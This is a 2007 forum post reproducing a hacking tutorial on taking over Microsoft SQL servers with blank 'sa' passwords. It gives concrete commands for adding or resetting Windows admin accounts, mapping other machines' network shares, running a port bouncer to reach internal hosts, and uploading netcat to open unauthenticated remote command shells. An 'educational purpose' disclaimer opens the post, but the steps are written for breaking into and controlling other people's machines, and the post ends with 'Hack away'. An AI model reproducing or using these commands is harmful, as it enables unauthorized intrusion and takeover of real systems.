Gonzalez Posted July 4, 2007 Report Posted July 4, 2007 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++This is a little Disclaimer for if you havn't read the one on our site. ++The tools and tutorials KD-Team develops and publishes are only ment for ++educational purpose only.WE DO NOT encourage the use of this tools and ++tutorials for mailicious purpose.We learned a lot during the development of them ++so we hope you also learn and don't just use it without any brains. ++We take completly NO responsability for any damage caused by them nor ++are we or our isp responsible for what you do with them. ++Greetz: KD-Team ++[url]http://www.kd-team.com[/url] +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++SQL- Possible situation and solutions to it.Written By: kd-teamSome info is from other tutorials thx to the peeps who wrote them.Well this tut is intended for the harder machines that are not so easy to hack.1.) a machine with a intern ip number2.) a machine in a network with no rights to write to the local harddisk3.) a alternative shell to the normal sqlexec.exe4.) A bit of maybe usefull words______________________________________1.) a machine with a intern ip number |______________________________________*********Solution Number 1:************************Thx to dD for the initial tutorial.Let's say you hack a machine with the normal sa/blank pass and when you do ipconfigit says 10.0.0.15 or 192.53.56.12.The first thing to do is to check if it has firewall if that is not the case then lookif port 135 = open or port 3389.Add yourself as a new user or change the password of the adminchange: net user Admin newpassnew: net user test password /addWhen you've done this you can connect with remote desktop to 3389 and use the user/passor just do it the traditional NT way *********Solution Number 2:************************Always when you have a machine with a internal ip number it means that it is part of a networkthat means 2 things that is has ports forwarded that's how you hacked it the port of SQL = forwardedpretty dumb but ohwell and it also means that there is another machine who has a normal ip or arouter.If it is a normal machine then they have used software things and 2 network card to make a network ifthis is the case you can still run a ftp server on it.first you've got to do is find out what the main server could be view computers on te network: net viewusually it has normal names to recognize like Server2000, PrimaryPc, Server, MainServer etcOnes you've find that out you've got to see if they have sharesshare command: net view \\MainServerif they've got like C shared or something like that you can just connect to it with no password.connect command: net use Z: \\MainServer\Cthen change to the new mapped drive. Now comes the tricky part.When you are on the share of the server you've got to install a bouncer or a redirector that is a thing that redirects the connection a port to another port or IP.For this example I'll use Bouncer already posted at the board:)you run it (it's best to install it as a service bouncer itself has no service option but it can still be done)command for bouncer: bouncer.exe --port 1234 --destination 192.53.56.12:1234 --daemonlittle info on this line --port = the listening port on the server machine--destination = the intern ip to where it sshould be bounced or redirected the incomming traffic.when this is done just run you're favo ftp server on the intern machine and all connection will get there._________________________________________________________________________2.) a machine in a network with no rights to write to the local harddisk |_________________________________________________________________________When you have a machine that when you use ftp or tftp says that it can't write to local harddisk.Then just used the method explained above to hack it on the NT way because even though you can't write to the harddisk you usually still can add users etc __________________________________________________3.) a alternative shell to the normal sqlexec.exe |__________________________________________________Usually when you have got sqlexec connected and you are working with it usually you get errors like:SQL_NO_DATASQL_ERRORand then you just can't do anything with it well here a simple but effective way to get a other shell.if tftp or ftp works just upload nc.exe(netcat can found everywhere on the net).ones uploaded there are 2 commands you can use:command1: nc.exe -l -p 1234 -d -e cmd.execommand2: nc.exe -p 1234 -L -d -e cmd.exefirst of all it is NOT WISE to install nc as a service since it doesn't have password protection thatmeans that anyone can take over the machine nou explanation of the commands:command1: this is a use and dump command it means that you can connect only ones to it after you disconnetit is gone then you've got to do it all over again with sql.But as said before this shell is intended to make the hack easier and not as backdoor.command2: with this command nc keeps listening so after you disconnect you can reconnect again.this is only handy if you are hacking a network and need to disconnect to do other things or somethinglike that but not recomended because if someone finds it bye bye stro you can stop this by killing ncafter you are done._________________________________4.) A bit of maybe usefull words |_________________________________When you are hacking or you wanna learn to hack plz make a diference for yourself I meanmake up you're mind if you wannabee super fxp/defacing dude (100boxes in 1 hour) ORyou wanna learn to hack interesting shit for the first peeps this tut is useless because it is time consuming so just use the normal and fast shitskip networks and such thingsfor the second peeps tut it can be usefull because it mixes a few ways together so at the end you havecontrol of the machine.Last thing to say Hack away but keep it nice Greetz,kd-team Quote
